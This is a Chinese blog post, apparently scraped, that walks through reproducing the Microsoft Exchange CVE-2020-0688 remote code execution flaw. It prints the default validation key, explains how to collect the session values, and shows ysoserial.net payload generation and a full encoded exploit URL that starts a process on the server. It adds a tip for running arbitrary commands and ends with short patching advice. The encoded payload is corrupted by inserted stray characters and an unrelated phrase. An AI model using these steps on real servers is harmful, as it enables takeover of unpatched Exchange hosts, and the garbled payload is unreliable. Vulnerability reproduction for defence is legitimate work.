如何实现exchange远程代码执行漏洞CVE-2020-0688复现

这篇文章给大家介绍如何实现exchange远程代码执行漏洞CVE-2020-0688复现，内容非常详细，感兴趣的小伙伴们可以参考借鉴，希望对大家能有所帮助。网络公开了一个编号为CVE-2020-0688的Microsoft Exchange Server远程代码执行漏洞，丁牛安全团队对该漏洞进行了模拟复现，分析了该漏洞成因及利用，希望可以帮助企业了解该漏洞的危害，及时修复漏洞远离黑客攻击。Microsoft Exchange Server 2010 Service Pack 3Microsoft Exchange Server 2013Microsoft Exchange Server 2016Microsoft Exchange Server 2019这个漏洞是由于Exchange服务器在安装时没有正确地创建唯一的加密密钥所造成的。具体来说，与正常软件安装每次都会产生随机密钥不同，所有Exchange Server在安装后的web.config文件中都拥有相同的validationKey和decryptionKey。这些密钥用于保证ViewState的安全性。而ViewState是ASP.NET Web应用以序列化格式存储在客户机上的服务端数据。客户端通过__VIEWSTATE请求参数将这些数据返回给服务器。攻击者可以在ExchangeControl Panel web应用上执行任意.net代码。当攻击者通过各种手段获得一个可以访问Exchange Control Panel （ECP）组件的用户账号密码时。攻击者可以在被攻击的exchange上执行任意代码，直接获取服务器权限。想要利用该漏洞，我们需要四个参数，分别为：–validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF（默认，漏洞产生原因）–validationalg = SHA1（默认，漏洞产生原因）–generator=B97B4E27（基本默认）–viewstateuserkey = ASP.NET_SessionId（手工获取，变量，每次登陆都不一致）在这四个变量中，前两个为默认固定，viewstateuserkey和generator的值需要从经过身份验证的session中收集。viewstateuserkey可以从ASP.NET的_SessionID cookie中获取，而generator可以在一个隐藏字段__VIEWSTATEGENERATOR中找到。所有这些都可以通过浏览器中的工具轻松获取。在正常登录后访问 /ecp/default.aspx 页面。使用F12开发者工具的Network选项，刷新页面重新发送请求，找到登录时/ecp/default.aspx的原始响应。在Headers选项卡找到ASP.NET_SessionId的cookie：在Response选项卡搜索__VIEWSTATEGENERATOR获取字段值：如果未找到此字段不必慌张，直接使用默认值B97B4E27 即可。使用ysoserial.net工具生成反序列化payload。 工具下载地址：https://github.com/pwntester/ysoserial.net/生成payload命令：在生成完payload代码后，需要对该代码进行URL Encode编码构造一个URL将最开始获得的__VIEWSTATEGENERATOR值替换，将URL Encode编码后的payload替换。示例：https://192.168.1.248/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyhAYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuM**wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuR**ybWF0dGluZy5UZXh0R**ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVnc**1bmRCcnVzaAECAAAABgMAAACmBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljc**zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXI免费云主机域名uTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BY2FsYy5leGU8L1N5c3RlbTpTdHJpbmc%2BDQogICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2BDQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQo8L1Jlc291cmNlRGljdGlvbmFyeT4Lp73ado0NJN2PSSnfOoN9h5H7xCU%3D访问构造好的URL地址，服务器会弹出500的错误，但攻击其实成功了。登录服务器查看进程，发现计算器成功启动。网上一些说法该漏洞对大版本的小版本有限制。其实不是这样的，应该是全版本通杀的。本人测试环境server 12 + exchange 2013。测试过15.0.516.32（2012 年12月3日）和15.0.1497.2（2019年6月18日）也就是update23，均存在漏洞，可以复现成功，16,19未测试，应该差不多。在最初版本的时候一直没有这个参数（确实不重要，基本为默认值），造成这一问题的主要原因是没有更新系统补丁KB2919355，更新该补丁后就会出现__VIEWSTATEGENERATOR字段。大部分复现者只复现到启动计算器，但是却无法创建文件。但经过测试发现问题出在ysoserial.exe的-c参数上，虽然在演示过程中可以直接-c “echo OOOPS!!! > c:/Vuln_Server.txt”创建文件，让人误以为-c是在cmd窗口下运行，但是实际上-c实际为“运行”的内容，因此直接echo是不行的，需要-c “cmd /c echo test > C:1.txt”，经测试成功创建文件，如图所示：对生成的payload编码时，需要注意只编码关键的特殊字符即可，如果全编码的话会无法利用成功。由于该漏洞需要利用Exchange Control Panel （ECP）组件，因此禁止此组件访问也不失为一个较为有效的应急方法，建议条件允许的情况下及时更新补丁。关于如何实现exchange远程代码执行漏洞CVE-2020-0688复现就分享到这里了，希望以上内容可以对大家有一定的帮助，可以学到更多知识。如果觉得文章不错，可以把它分享出去让更多的人看到。

相关推荐: js文件都能获取到哪些信息

js文件都能获取到哪些信息，相信很多没有经验的人对此束手无策，为此本文总结了问题出现的原因和解决方法，通过这篇文章希望你能解决这个问题。01 简介JavaScript已经成为现代Web浏览器开发中最普遍的技术之一。有的测试人员只审计html源代码，而忽略审计j…